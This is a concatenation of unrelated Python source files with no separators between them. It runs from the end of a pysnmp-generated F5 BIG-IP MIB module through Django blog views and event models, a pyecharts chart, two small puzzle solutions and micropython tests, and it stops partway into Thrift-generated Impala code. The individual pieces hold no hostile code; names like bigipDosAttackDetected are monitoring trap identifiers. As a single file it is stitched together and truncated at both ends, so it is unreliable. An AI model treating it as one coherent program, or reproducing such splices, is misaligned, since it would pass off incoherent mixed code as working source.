"bigipAsmSmtpRequestViolation"), ("F5-BIGIP-COMMON-MIB", "bigipBladeTempHigh"), ("F5-BIGIP-COMMON-MIB", "bigipBladeNoPower"), ("F5-BIGIP-COMMON-MIB", "bigipClusterdNoResponse"), ("F5-BIGIP-COMMON-MIB", "bigipBladeOffline"), ("F5-BIGIP-COMMON-MIB", "bigipAsmDosAttackDetected"), ("F5-BIGIP-COMMON-MIB", "bigipAsmBruteForceAttackDetected"), ("F5-BIGIP-COMMON-MIB", "bigipAomCpuTempTooHigh"), ("F5-BIGIP-COMMON-MIB", "bigipGtmKeyGenerationRollover"), ("F5-BIGIP-COMMON-MIB", "bigipGtmKeyGenerationExpiration"), ("F5-BIGIP-COMMON-MIB", "bigipRaidDiskFailure"), ("F5-BIGIP-COMMON-MIB", "bigipGtmProberPoolStatusChange"), ("F5-BIGIP-COMMON-MIB", "bigipGtmProberPoolStatusChangeReason"), ("F5-BIGIP-COMMON-MIB", "bigipGtmProberPoolDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmProberPoolEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmProberPoolMbrStatusChange"), ("F5-BIGIP-COMMON-MIB", "bigipGtmProberPoolMbrStatusChangeReason"), ("F5-BIGIP-COMMON-MIB", "bigipGtmProberPoolMbrDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmProberPoolMbrEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipAvrAlertsMetricSnmp"), ("F5-BIGIP-COMMON-MIB", "bigipAvrAlertsMetricSmtp"), ("F5-BIGIP-COMMON-MIB", "bigipVcmpAlertsVcmpPowerOn"), ("F5-BIGIP-COMMON-MIB", "bigipVcmpAlertsVcmpPowerOff"), ("F5-BIGIP-COMMON-MIB", "bigipVcmpAlertsVcmpHBLost"), ("F5-BIGIP-COMMON-MIB", "bigipVcmpAlertsVcmpHBDetected"), ("F5-BIGIP-COMMON-MIB", "bigipSsdMwiNearThreshold"), ("F5-BIGIP-COMMON-MIB", "bigipSsdMwiReachedThreshold"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertTempHigh"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertVoltageHigh"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertFanSpeedLow"), ("F5-BIGIP-COMMON-MIB", "bigipLibhalSsdPhysicalDiskRemoved"), ("F5-BIGIP-COMMON-MIB", "bigipLibhalSsdLogicalDiskRemoved"), ("F5-BIGIP-COMMON-MIB", "bigipLibhalDiskBayRemoved"), ("F5-BIGIP-COMMON-MIB", "bigipLibhalBladePoweredOff"), ("F5-BIGIP-COMMON-MIB", "bigipLibhalSensorAlarmCritical"), ("F5-BIGIP-COMMON-MIB", "bigipChmandAlertFanTrayBad"), ("F5-BIGIP-COMMON-MIB", "bigipUnsolicitedRepliesExceededThreshold"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertVoltageLow"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertMilliVoltageHigh"), 
("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertCurrentHigh"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertPowerHigh"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertMilliVoltageLow"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertCurrentLow"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertPowerLow"), ("F5-BIGIP-COMMON-MIB", "bigipNodeRate"), ("F5-BIGIP-COMMON-MIB", "bigipMemberRate"), ("F5-BIGIP-COMMON-MIB", "bigipVirtualRate"), ("F5-BIGIP-COMMON-MIB", "bigipDosAttackStart"), ("F5-BIGIP-COMMON-MIB", "bigipDosAttackStop"), ("F5-BIGIP-COMMON-MIB", "bigipLtmVsAvail"), ("F5-BIGIP-COMMON-MIB", "bigipLtmVsUnavail"), ("F5-BIGIP-COMMON-MIB", "bigipLtmVsEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipLtmVsDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipDnsRequestRateLimiterEngaged"), ("F5-BIGIP-COMMON-MIB", "bigipGtmRequestRateLimiterEngaged"), ("F5-BIGIP-COMMON-MIB", "bigipTrafficGroupStandby"), ("F5-BIGIP-COMMON-MIB", "bigipTrafficGroupActive"), ("F5-BIGIP-COMMON-MIB", "bigipTrafficGroupOffline"), ("F5-BIGIP-COMMON-MIB", "bigipTrafficGroupForcedOffline"), ("F5-BIGIP-COMMON-MIB", "bigipTrafficGroupDeactivate"), ("F5-BIGIP-COMMON-MIB", "bigipTrafficGroupActivate"), ("F5-BIGIP-COMMON-MIB", "bigipPsPowerOn"), ("F5-BIGIP-COMMON-MIB", "bigipPsPowerOff"), ("F5-BIGIP-COMMON-MIB", "bigipPsAbsent"), ("F5-BIGIP-COMMON-MIB", "bigipClusterPrimaryChanged"), ("F5-BIGIP-COMMON-MIB", "bigipSystemShutdown"), ("F5-BIGIP-COMMON-MIB", "bigipFipsDeviceError"), ("F5-BIGIP-COMMON-MIB", "bigipUpdatePriority"), ("F5-BIGIP-COMMON-MIB", "bigipUpdateServer"), ("F5-BIGIP-COMMON-MIB", "bigipUpdateError"), ("F5-BIGIP-COMMON-MIB", "bigipFipsFault")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): bigipSystemNotifyGroup = bigipSystemNotifyGroup.setStatus('current') class LongDisplayString(TextualConvention, OctetString): status = 'current' displayHint = '1024a' subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(0, 1024) mibBuilder.exportSymbols("F5-BIGIP-COMMON-MIB", bigipCpuFanSpeedBad=bigipCpuFanSpeedBad, bigipTrafficGroupForcedOffline=bigipTrafficGroupForcedOffline, bigipAsmSmtpRequestViolation=bigipAsmSmtpRequestViolation, bigipStandby=bigipStandby, bigipGtmServerAvail=bigipGtmServerAvail, bigipNotifyObjMsg=bigipNotifyObjMsg, bigipLicenseFailed=bigipLicenseFailed, bigipSystemCheckAlertPowerLow=bigipSystemCheckAlertPowerLow, bigipLtmVsEnabled=bigipLtmVsEnabled, bigipGtmVsDisabled=bigipGtmVsDisabled, bigipSystemCheckAlertCurrentHigh=bigipSystemCheckAlertCurrentHigh, bigipCpuTempHigh=bigipCpuTempHigh, bigipCompLimitExceeded=bigipCompLimitExceeded, bigipGtmVsNotAvail=bigipGtmVsNotAvail, bigipGtmBoxAvail=bigipGtmBoxAvail, bigipGtmDcEnabled=bigipGtmDcEnabled, bigipGtmJoinedGroup=bigipGtmJoinedGroup, bigipGtmPoolMbrNotAvail=bigipGtmPoolMbrNotAvail, bigipAggrReaperStateChange=bigipAggrReaperStateChange, bigipLogCrit=bigipLogCrit, bigipChmandAlertFanTrayBad=bigipChmandAlertFanTrayBad, bigipLogErr=bigipLogErr, bigipTrafficMgmt=bigipTrafficMgmt, bigipGtmProberPoolEnabled=bigipGtmProberPoolEnabled, bigipGtmAppObjAvail=bigipGtmAppObjAvail, bigipLtmVsDisabled=bigipLtmVsDisabled, bigipChassisFanBad=bigipChassisFanBad, bigipVirtualRate=bigipVirtualRate, bigipDiskPartitionGrowth=bigipDiskPartitionGrowth, bigipDosAttackStart=bigipDosAttackStart, bigipInetPortExhaustion=bigipInetPortExhaustion, f5=f5, bigipAomCpuTempTooHigh=bigipAomCpuTempTooHigh, bigipVcmpAlertsVcmpHBDetected=bigipVcmpAlertsVcmpHBDetected, bigipSystemNotifyGroup=bigipSystemNotifyGroup, bigipChassisPowerSupplyBad=bigipChassisPowerSupplyBad, 
bigipActiveActive=bigipActiveActive, bigipGtmPoolEnabled=bigipGtmPoolEnabled, bigipUpdatePriority=bigipUpdatePriority, bigipGtmProberPoolMbrEnabled=bigipGtmProberPoolMbrEnabled, bigipGtmKeyGenerationExpiration=bigipGtmKeyGenerationExpiration, bigipGtmProberPoolMbrDisabled=bigipGtmProberPoolMbrDisabled, bigipNodeUp=bigipNodeUp, bigipAsmBruteForceAttackDetected=bigipAsmBruteForceAttackDetected, bigipGtmLinkNotAvail=bigipGtmLinkNotAvail, bigipSsdMwiNearThreshold=bigipSsdMwiNearThreshold, bigipGtmPoolMbrAvail=bigipGtmPoolMbrAvail, bigipGtmKeyGenerationRollover=bigipGtmKeyGenerationRollover, bigipVcmpAlertsVcmpHBLost=bigipVcmpAlertsVcmpHBLost, bigipMemberRate=bigipMemberRate, bigipDiskPartitionWarn=bigipDiskPartitionWarn, bigipGtmVsAvail=bigipGtmVsAvail, bigipUpdateServer=bigipUpdateServer, bigipCompliances=bigipCompliances, bigipClusterdNoResponse=bigipClusterdNoResponse, bigipGtmPoolDisabled=bigipGtmPoolDisabled, bigipRaidDiskFailure=bigipRaidDiskFailure, bigipSystemCheckAlertPowerHigh=bigipSystemCheckAlertPowerHigh, bigipPsPowerOn=bigipPsPowerOn, bigipLibhalSsdLogicalDiskRemoved=bigipLibhalSsdLogicalDiskRemoved, PYSNMP_MODULE_ID=f5, bigipNotifyObjPort=bigipNotifyObjPort, bigipFeatureFailed=bigipFeatureFailed, bigipNotifyObjNode=bigipNotifyObjNode, bigipLtmVsAvail=bigipLtmVsAvail, bigipAsmRequestViolation=bigipAsmRequestViolation, bigipPsAbsent=bigipPsAbsent, bigipFipsDeviceError=bigipFipsDeviceError, bigipAsmDosAttackDetected=bigipAsmDosAttackDetected, bigipLogEmerg=bigipLogEmerg, bigipLibhalDiskBayRemoved=bigipLibhalDiskBayRemoved, bigipGtmRequestRateLimiterEngaged=bigipGtmRequestRateLimiterEngaged, bigipLibhalBladePoweredOff=bigipLibhalBladePoweredOff, bigipFeatureOnline=bigipFeatureOnline, bigipClusterPrimaryChanged=bigipClusterPrimaryChanged, bigipSystemCheckAlertTempHigh=bigipSystemCheckAlertTempHigh, bigipGtmWideIpAvail=bigipGtmWideIpAvail, bigipGtmAppObjNotAvail=bigipGtmAppObjNotAvail, bigipGtmPoolMbrDisabled=bigipGtmPoolMbrDisabled, bigipGroups=bigipGroups, bigipBladeOffline=bigipBladeOffline, bigipTrafficGroupStandby=bigipTrafficGroupStandby, bigipAgentShutdown=bigipAgentShutdown, bigipChassisTempHigh=bigipChassisTempHigh, bigipAsmSmtpRequestBlocked=bigipAsmSmtpRequestBlocked, bigipGtmVsEnabled=bigipGtmVsEnabled, LongDisplayString=LongDisplayString, bigipGtmAppAvail=bigipGtmAppAvail, bigipGtmLinkDisabled=bigipGtmLinkDisabled, bigipSystemCheckAlertMilliVoltageLow=bigipSystemCheckAlertMilliVoltageLow, bigipLogAlert=bigipLogAlert, bigipServiceDown=bigipServiceDown, bigipGtmSslCertWillExpire=bigipGtmSslCertWillExpire, bigipGtmProberPoolStatusChangeReason=bigipGtmProberPoolStatusChangeReason, bigipTrafficGroupOffline=bigipTrafficGroupOffline, bigipSystemCheckAlertVoltageLow=bigipSystemCheckAlertVoltageLow, bigipNodeDown=bigipNodeDown, bigipFipsFault=bigipFipsFault, bigipLogWarning=bigipLogWarning, bigipBladeTempHigh=bigipBladeTempHigh, bigipGtmPoolNotAvail=bigipGtmPoolNotAvail, bigipGtmProberPoolMbrStatusChangeReason=bigipGtmProberPoolMbrStatusChangeReason, bigipGtmServerEnabled=bigipGtmServerEnabled, bigipUnsolicitedRepliesExceededThreshold=bigipUnsolicitedRepliesExceededThreshold, bigipAsmRequestBlocked=bigipAsmRequestBlocked, bigipAgentRestart=bigipAgentRestart, bigipActive=bigipActive, bigipSystemCheckAlertVoltageHigh=bigipSystemCheckAlertVoltageHigh, bigipHardDiskFailure=bigipHardDiskFailure, bigipCpuFanSpeedLow=bigipCpuFanSpeedLow, bigipBladeNoPower=bigipBladeNoPower, bigipNotificationGroups=bigipNotificationGroups, bigipGtmProberPoolDisabled=bigipGtmProberPoolDisabled, 
bigipExternalLinkChange=bigipExternalLinkChange, bigipGtmSslCertExpired=bigipGtmSslCertExpired, bigipNotifyObjectsGroup=bigipNotifyObjectsGroup, bigipNodeRate=bigipNodeRate, bigipGtmDcDisabled=bigipGtmDcDisabled, bigipAuthFailed=bigipAuthFailed, bigipTrafficGroupActivate=bigipTrafficGroupActivate, bigipTamdAlert=bigipTamdAlert, bigipLibhalSsdPhysicalDiskRemoved=bigipLibhalSsdPhysicalDiskRemoved, bigipGtmPoolMbrEnabled=bigipGtmPoolMbrEnabled, bigipGtmAppNotAvail=bigipGtmAppNotAvail, bigipUpdateError=bigipUpdateError, bigipGtmWideIpNotAvail=bigipGtmWideIpNotAvail, bigipPacketRejected=bigipPacketRejected, bigipNotificationCompliance=bigipNotificationCompliance, bigipGtmWideIpDisabled=bigipGtmWideIpDisabled, bigipSsdMwiReachedThreshold=bigipSsdMwiReachedThreshold, bigipSystemShutdown=bigipSystemShutdown, bigipGtmWideIpEnabled=bigipGtmWideIpEnabled, bigipLicenseExpired=bigipLicenseExpired, bigipSystemCheckAlertMilliVoltageHigh=bigipSystemCheckAlertMilliVoltageHigh, bigipARPConflict=bigipARPConflict, bigipTrafficGroupDeactivate=bigipTrafficGroupDeactivate, bigipStandByFail=bigipStandByFail, bigipNotifyObjects=bigipNotifyObjects, bigipSystemCheckAlertCurrentLow=bigipSystemCheckAlertCurrentLow, bigipVcmpAlertsVcmpPowerOff=bigipVcmpAlertsVcmpPowerOff, bigipServiceUp=bigipServiceUp, bigipAsmFtpRequestBlocked=bigipAsmFtpRequestBlocked, bigipAsmFtpRequestViolation=bigipAsmFtpRequestViolation, bigipNotification=bigipNotification, bigipNetLinkDown=bigipNetLinkDown, bigipTrafficGroupActive=bigipTrafficGroupActive, bigipGtmLinkAvail=bigipGtmLinkAvail, bigipGtmDcAvail=bigipGtmDcAvail, bigipCompliance=bigipCompliance, bigipGtmLeftGroup=bigipGtmLeftGroup, bigipAvrAlertsMetricSmtp=bigipAvrAlertsMetricSmtp, bigipPsPowerOff=bigipPsPowerOff, bigipGtmPoolAvail=bigipGtmPoolAvail, bigipAvrAlertsMetricSnmp=bigipAvrAlertsMetricSnmp, bigipSslLimitExceeded=bigipSslLimitExceeded, bigipAgentStart=bigipAgentStart, bigipDosAttackStop=bigipDosAttackStop, bigipGtmBoxNotAvail=bigipGtmBoxNotAvail, bigipGtmBig3dSslCertExpired=bigipGtmBig3dSslCertExpired, bigipVcmpAlertsVcmpPowerOn=bigipVcmpAlertsVcmpPowerOn, bigipGtmProberPoolMbrStatusChange=bigipGtmProberPoolMbrStatusChange, bigipLtmVsUnavail=bigipLtmVsUnavail, bigipGtmProberPoolStatusChange=bigipGtmProberPoolStatusChange, bigipGtmServerDisabled=bigipGtmServerDisabled, bigipGtmBig3dSslCertWillExpire=bigipGtmBig3dSslCertWillExpire, bigipConfigLoaded=bigipConfigLoaded, bigipLibhalSensorAlarmCritical=bigipLibhalSensorAlarmCritical, bigipDnsRequestRateLimiterEngaged=bigipDnsRequestRateLimiterEngaged, bigipGtmServerNotAvail=bigipGtmServerNotAvail, bigipNotifications=bigipNotifications, bigipAgentNotifyGroup=bigipAgentNotifyGroup, bigipGtmLinkEnabled=bigipGtmLinkEnabled, bigipGtmDcNotAvail=bigipGtmDcNotAvail, bigipSystemCheckAlertFanSpeedLow=bigipSystemCheckAlertFanSpeedLow)
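# A hypothetical sketch of resolving one notification OID from this generated
# module with pysnmp. It assumes the file is installed on the MIB builder's
# search path under the module name F5-BIGIP-COMMON-MIB.
from pysnmp.smi import builder, view
from pysnmp.smi.rfc1902 import ObjectIdentity

mib_builder = builder.MibBuilder()
mib_builder.loadModules('F5-BIGIP-COMMON-MIB')
mib_view = view.MibViewController(mib_builder)

oid = ObjectIdentity('F5-BIGIP-COMMON-MIB', 'bigipServiceDown')
oid.resolveWithMib(mib_view)
print(oid.getOid())  # 1.3.6.1.4.1.3375.2.4.0.10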
# Copyright (c) ZJUTCV. All rights reserved.
def points2xyxy(points):
    """Convert a quadrilateral given as 8 flat coordinates into an
    axis-aligned bounding box.

    Args:
        points (list): [x1, y1, x2, y2, x3, y3, x4, y4] corner coordinates.

    Returns:
        list: [x_min, y_min, x_max, y_max] of the enclosing box.
    """
    x_list = [points[i] for i in range(0, 8, 2)]
    y_list = [points[i] for i in range(1, 8, 2)]
    x_min = min(x_list)
    x_max = max(x_list)
    y_min = min(y_list)
    y_max = max(y_list)
    return [x_min, y_min, x_max, y_max]
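# A quick usage sketch (the sample corner coordinates below are made up,
# listed clockwise from the top-left corner):
quad = [10, 20, 50, 18, 52, 60, 12, 62]
print(points2xyxy(quad))  # -> [10, 18, 52, 62]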
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.conf import settings
from django.shortcuts import get_object_or_404
from django.utils import six
from django.views.generic import ArchiveIndexView, DateDetailView

from glitter.mixins import GlitterDetailMixin

from .models import Category, Post


class BasePostListView(ArchiveIndexView):
    allow_empty = True
    date_field = 'date'
    paginate_by = getattr(settings, 'NEWS_PER_PAGE', 10)
    template_name_suffix = '_list'
    context_object_name = 'object_list'
    ordering = ('-is_sticky', '-date', '-id')

    def get_queryset(self):
        queryset = Post.objects.published()
        ordering = self.get_ordering()
        if ordering:
            if isinstance(ordering, six.string_types):
                ordering = (ordering,)
            queryset = queryset.order_by(*ordering)
        return queryset

    def get_context_data(self, **kwargs):
        context = super(BasePostListView, self).get_context_data(**kwargs)
        context['categories'] = Category.objects.all()
        context['news_categories'] = True
        return context


class PostListView(BasePostListView):

    def get_ordering(self):
        if getattr(settings, 'NEWS_STICKY_ON_ALL', True):
            return super(PostListView, self).get_ordering()
        else:
            return ('-date', '-id')


class PostListCategoryView(BasePostListView):
    template_name_suffix = '_category_list'

    def get_queryset(self):
        qs = super(PostListCategoryView, self).get_queryset()
        self.category = get_object_or_404(Category, slug=self.kwargs['slug'])
        return qs.filter(category=self.category)

    def get_context_data(self, **kwargs):
        context = super(PostListCategoryView, self).get_context_data(**kwargs)
        context['current_category'] = self.category
        return context


class PostDetailView(GlitterDetailMixin, DateDetailView):
    queryset = Post.objects.select_related().filter(published=True)
    month_format = '%m'
    date_field = 'date'

    def get_allow_future(self):
        """
        Allow future-dated posts only for users who hold the edit
        permission on the post model (e.g. superusers).
        """
        qs = self.get_queryset()
        post_edit_permission = '{}.edit_{}'.format(
            qs.model._meta.app_label, qs.model._meta.model_name
        )
        if self.request.user.has_perm(post_edit_permission):
            return True
        return False

    def get_context_data(self, **kwargs):
        context = super(PostDetailView, self).get_context_data(**kwargs)
        context['categories'] = Category.objects.all()
        # Add this to display 'All news' on categories list.
        context['news_categories'] = True
        context['current_category'] = self.object.category
        return context


class PostListTagView(PostListView):
    template_name_suffix = '_tag_list'

    def get_queryset(self):
        qs = super(PostListTagView, self).get_queryset()
        self.tag = get_object_or_404(Post.tags.all(), slug=self.kwargs['slug'])
        return qs.filter(tags=self.tag)

    def get_context_data(self, **kwargs):
        context = super(PostListTagView, self).get_context_data(**kwargs)
        context['current_tag'] = self.tag
        return context
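# A minimal, hypothetical urls.py wiring for the views above; the route
# names and regex patterns are assumptions, not the actual
# django-glitter-news URL configuration.
from django.conf.urls import url

urlpatterns = [
    url(r'^$', PostListView.as_view(), name='list'),
    url(r'^category/(?P<slug>[\w-]+)/$', PostListCategoryView.as_view(), name='category'),
    url(r'^tag/(?P<slug>[\w-]+)/$', PostListTagView.as_view(), name='tag'),
    # DateDetailView needs year/month/day kwargs; month is two digits ('%m').
    url(r'^(?P<year>\d{4})/(?P<month>\d{2})/(?P<day>\d{2})/(?P<slug>[\w-]+)/$',
        PostDetailView.as_view(), name='detail'),
]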
import random

from pyecharts import options as opts
from pyecharts.charts import Polar

c = (
    Polar()
    .add("", [(10, random.randint(1, 100)) for i in range(300)], type_="scatter")
    .add("", [(11, random.randint(1, 100)) for i in range(300)], type_="scatter")
    .set_series_opts(label_opts=opts.LabelOpts(is_show=False))
    .set_global_opts(title_opts=opts.TitleOpts(title="Polar-Scatter1"))
    .render("polar_scatter_1.html")
)
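# Note that .render() ends the chain and returns the output file path, so
# `c` above holds a string, not the chart. To keep the chart object around
# (e.g. to call render_notebook() in Jupyter), build first, render after:
polar = (
    Polar()
    .add("", [(10, random.randint(1, 100)) for i in range(300)], type_="scatter")
    .set_global_opts(title_opts=opts.TitleOpts(title="Polar-Scatter1"))
)
polar.render("polar_scatter_1.html")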
from django.db import models
from django.contrib.auth.models import User
from django.conf import settings
from django.utils.timezone import now
from django.utils import timezone
# from froala_editor.fields import FroalaField
from django.contrib.auth import get_user_model

# Create your models here.
# from .models import OrganiseEvent


class OrganiseEvent(models.Model):
    event_title = models.CharField(max_length=200)
    event_description = models.CharField(max_length=800)
    event_category = models.CharField(max_length=200)
    org_name = models.CharField(max_length=200)
    org_email = models.EmailField(max_length=100)
    org_mobile = models.BigIntegerField()
    org_contact_person = models.CharField(max_length=100)
    event_poster = models.ImageField(
        upload_to='images/event_poster/', default="images/noimage.png")
    event_startdate = models.DateTimeField(default=now)
    event_enddate = models.DateTimeField()
    us = models.ForeignKey(User, on_delete=models.CASCADE)

    def summary(self):
        return self.event_description[:150]


class EventDetails(models.Model):
    event = models.CharField(max_length=200)
    expected_participant = models.IntegerField()
    no_participant = models.IntegerField()
    event_level = models.CharField(max_length=200)
    eligibility = models.CharField(max_length=200)
    prerequisite = models.TextField(max_length=1500)
    facility = models.CharField(max_length=100)
    event_detail_docs = models.FileField(
        upload_to='images/event_details_docs/')
    us = models.ForeignKey(User, on_delete=models.CASCADE)
    org_id = models.ForeignKey(OrganiseEvent, on_delete=models.CASCADE)


class ShareResource(models.Model):
    event_title = models.CharField(max_length=100)
    subject = models.CharField(max_length=100)
    description = models.TextField(max_length=1500)
    publishedDate = models.DateTimeField(default=now)
    resourceLink = models.CharField(max_length=100)
    documentFile = models.FileField(upload_to='images/shared_resources_docs/')
    publisedBy = models.CharField(max_length=100)
    resourceImage = models.ImageField(upload_to='images/shared_resources/')
    us = models.ForeignKey(User, on_delete=models.CASCADE)
    org_id = models.ForeignKey(OrganiseEvent, on_delete=models.CASCADE)


class SponsorShip(models.Model):
    event_title = models.CharField(max_length=100, default=True)
    platinum_sponsor = models.CharField(max_length=100)
    f_platinum = models.TextField(max_length=1500)
    ex_platinum = models.IntegerField()
    gold_sponsor = models.CharField(max_length=100)
    f_gold = models.TextField(max_length=1500)
    ex_gold = models.IntegerField()
    silver_sponsor = models.CharField(max_length=100)
    f_silver = models.TextField(max_length=1500)
    ex_silver = models.IntegerField()
    us = models.ForeignKey(User, on_delete=models.CASCADE)
    org_id = models.ForeignKey(OrganiseEvent, on_delete=models.CASCADE)


class Event_Location(models.Model):
    event_venue_name = models.CharField(max_length=200)
    event_venue_addr = models.CharField(max_length=300)
    event_latitude = models.CharField(max_length=100)
    event_longitude = models.CharField(max_length=100)
    eventid = models.ForeignKey(OrganiseEvent, on_delete=models.CASCADE)
    event_name = models.CharField(max_length=200)
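# A hedged ORM usage sketch for the models above. All field values are made
# up; it assumes an existing User row and that Pillow is installed for the
# ImageField. event_poster is omitted because it has a default.
def create_demo_event(user):
    return OrganiseEvent.objects.create(
        event_title='Demo Hackathon',
        event_description='A 24-hour demo event.',
        event_category='Technical',
        org_name='Demo Org',
        org_email='org@example.com',
        org_mobile=9999999999,
        org_contact_person='A. Organiser',
        event_startdate=now(),
        event_enddate=now(),
        us=user,
    )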
def gcd(a, b):
    # Euclid's algorithm (recursive).
    if a % b == 0:
        return b
    else:
        return gcd(b, a % b)


def main():
    A = B = 1
    for a in range(10, 100):
        for b in range(a + 1, 100):
            # a/b "digit-cancels" when the last digit of a equals the first
            # digit of b; strike that digit and compare x/y with a/b.
            x = a % 10
            y = b // 10
            if x != y:
                continue
            x = a // 10
            y = b % 10
            if y == 0:
                continue
            if x // gcd(x, y) == a // gcd(a, b) and \
               y // gcd(x, y) == b // gcd(a, b):
                # print(A, B)
                A *= a
                B *= b
    print(B // gcd(A, B))


main()
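# This looks like the digit-cancelling fractions problem (Project Euler 33).
# As an independent cross-check with fractions.Fraction: the four known
# non-trivial cases are 16/64, 19/95, 26/65 and 49/98, whose product reduces
# to 1/100, matching the denominator printed by main().
from fractions import Fraction

product = Fraction(16, 64) * Fraction(19, 95) * Fraction(26, 65) * Fraction(49, 98)
print(product.denominator)  # 100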
""" Vowel to Vowel Links Given a sentence as txt, return True if any two adjacent words have this property: One word ends with a vowel, while the word immediately after begins with a vowel (a e i o u). Examples vowel_links("a very large appliance") ➞ True vowel_links("go to edabit") ➞ True vowel_links("an open fire") ➞ False vowel_links("a sudden applause") ➞ False Notes You can expect sentences in only lowercase. """ def vowel_links(txt): a, v = list(txt.split(" ")), "aeiou" for i in range(len(a)-1) : if (a[i][-1] in v) and ((a[i+1])[0] in v): return True return False vowel_links("a very large appliance") #➞ True #vowel_links("go to edabit") #➞ True #vowel_links("an open fire") #➞ False #vowel_links("a sudden applause") #➞False
import pytest
from pathlib import Path

# pylint: disable=wrong-import-position,import-error
import basicgit as git

# Module Under Test
import get_mpy


# No mocks, does actual extraction from the repo
# TODO: allow tests to work on any path, not just my own machine
@pytest.mark.parametrize(
    "path, port, board",
    [
        ('C:\\develop\\MyPython\\TESTREPO-micropython\\ports\\esp32\\modules\\_boot.py', 'esp32', None),
        ('/develop/MyPython/TESTREPO-micropython/ports/esp32/modules/_boot.py', 'esp32', None),
        ('../TESTREPO-micropython/ports/esp32/modules/_boot.py', 'esp32', None),
        ('C:\\develop\\MyPython\\TESTREPO-micropython\\ports\\stm32\\boards\\PYBV11\\modules\\_boot.py', 'stm32', 'PYBV11'),
        ('/develop/MyPython/TESTREPO-micropython/ports/stm32/boards/PYBV11/modules/_boot.py', 'stm32', 'PYBV11'),
        ('../TESTREPO-micropython/ports/stm32/boards/PYBV11/modules/_boot.py', 'stm32', 'PYBV11'),
    ]
)
def test_extract_target_names(path, port, board):
    _port, _board = get_mpy.get_target_names(path)
    assert _board == board
    assert _port == port


def test_freezer_mpy_manifest(tmp_path, testrepo_micropython, testrepo_micropython_lib):
    "test if we can freeze source using manifest.py files"
    # mpy_path = Path(testrepo_micropython)
    # mpy_lib = Path(testrepo_micropython_lib)
    mpy_path = testrepo_micropython
    mpy_lib = testrepo_micropython_lib

    # mpy version must be at 1.12 or newer
    mpy_version = 'v1.12'
    version = git.get_tag(mpy_path)
    # NOTE: this is a plain string comparison of tag names, not a
    # semver-aware comparison.
    if version < mpy_version:
        git.checkout_tag(mpy_version, mpy_path)
        version = git.get_tag(mpy_path)
        assert version == mpy_version, "prep: could not checkout version {} of {}".format(mpy_version, mpy_path)

    stub_path = Path(tmp_path)
    get_mpy.get_frozen(str(stub_path), version=mpy_version, mpy_path=mpy_path, lib_path=mpy_lib)
    scripts = list(stub_path.rglob('*.py'))

    assert scripts is not None, "can freeze scripts from manifest"
    assert len(scripts) > 10, "expect more than 10 files, only found {}".format(len(scripts))


def test_freezer_mpy_folders(tmp_path, testrepo_micropython):
    "test if we can freeze source using modules folders"
    mpy_path = testrepo_micropython

    # mpy version must be older than 1.12 (so use 1.10)
    mpy_version = 'v1.10'
    version = git.get_tag(mpy_path)
    if version != mpy_version:
        git.checkout_tag(mpy_version, mpy_path)
        version = git.get_tag(mpy_path)
        assert version == mpy_version, "prep: could not checkout version {} of ../micropython".format(mpy_version)

    stub_path = tmp_path
    # freezer_mpy.get_frozen(stub_path, mpy_path, lib_path='../micropython-lib')
    get_mpy.get_frozen_folders(stub_path, mpy_path, lib_path='../micropython-lib', version=mpy_version)
    assert True
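# A hypothetical conftest.py sketch for the two repo-path fixtures the tests
# above rely on (testrepo_micropython / testrepo_micropython_lib). The real
# fixtures may locate or clone the repositories differently; the paths below
# are assumptions taken from the parametrized test cases.
import pytest


@pytest.fixture
def testrepo_micropython():
    # Path to a local micropython checkout used by the tests (assumption).
    return '../TESTREPO-micropython'


@pytest.fixture
def testrepo_micropython_lib():
    # Path to a local micropython-lib checkout (assumption).
    return '../TESTREPO-micropython-lib'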
# # Autogenerated by Thrift Compiler (0.9.0) # # DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING # # options string: py # from thrift.Thrift import TType, TMessageType, TException, TApplicationException import Status.ttypes import ErrorCodes.ttypes import Types.ttypes import Exprs.ttypes import CatalogObjects.ttypes import Descriptors.ttypes import PlanNodes.ttypes import Planner.ttypes import DataSinks.ttypes import Results.ttypes import RuntimeProfile.ttypes import ImpalaService.ttypes import Data.ttypes from thrift.transport import TTransport from thrift.protocol import TBinaryProtocol, TProtocol try: from thrift.protocol import fastbinary except: fastbinary = None class TParquetFallbackSchemaResolution: POSITION = 0 NAME = 1 _VALUES_TO_NAMES = { 0: "POSITION", 1: "NAME", } _NAMES_TO_VALUES = { "POSITION": 0, "NAME": 1, } class TParquetArrayResolution: THREE_LEVEL = 0 TWO_LEVEL = 1 TWO_LEVEL_THEN_THREE_LEVEL = 2 _VALUES_TO_NAMES = { 0: "THREE_LEVEL", 1: "TWO_LEVEL", 2: "TWO_LEVEL_THEN_THREE_LEVEL", } _NAMES_TO_VALUES = { "THREE_LEVEL": 0, "TWO_LEVEL": 1, "TWO_LEVEL_THEN_THREE_LEVEL": 2, } class TJoinDistributionMode: BROADCAST = 0 SHUFFLE = 1 _VALUES_TO_NAMES = { 0: "BROADCAST", 1: "SHUFFLE", } _NAMES_TO_VALUES = { "BROADCAST": 0, "SHUFFLE": 1, } class TSessionType: BEESWAX = 0 HIVESERVER2 = 1 _VALUES_TO_NAMES = { 0: "BEESWAX", 1: "HIVESERVER2", } _NAMES_TO_VALUES = { "BEESWAX": 0, "HIVESERVER2": 1, } class ImpalaInternalServiceVersion: V1 = 0 _VALUES_TO_NAMES = { 0: "V1", } _NAMES_TO_VALUES = { "V1": 0, } class TQueryOptions: """ Attributes: - abort_on_error - max_errors - disable_codegen - batch_size - num_nodes - max_scan_range_length - num_scanner_threads - 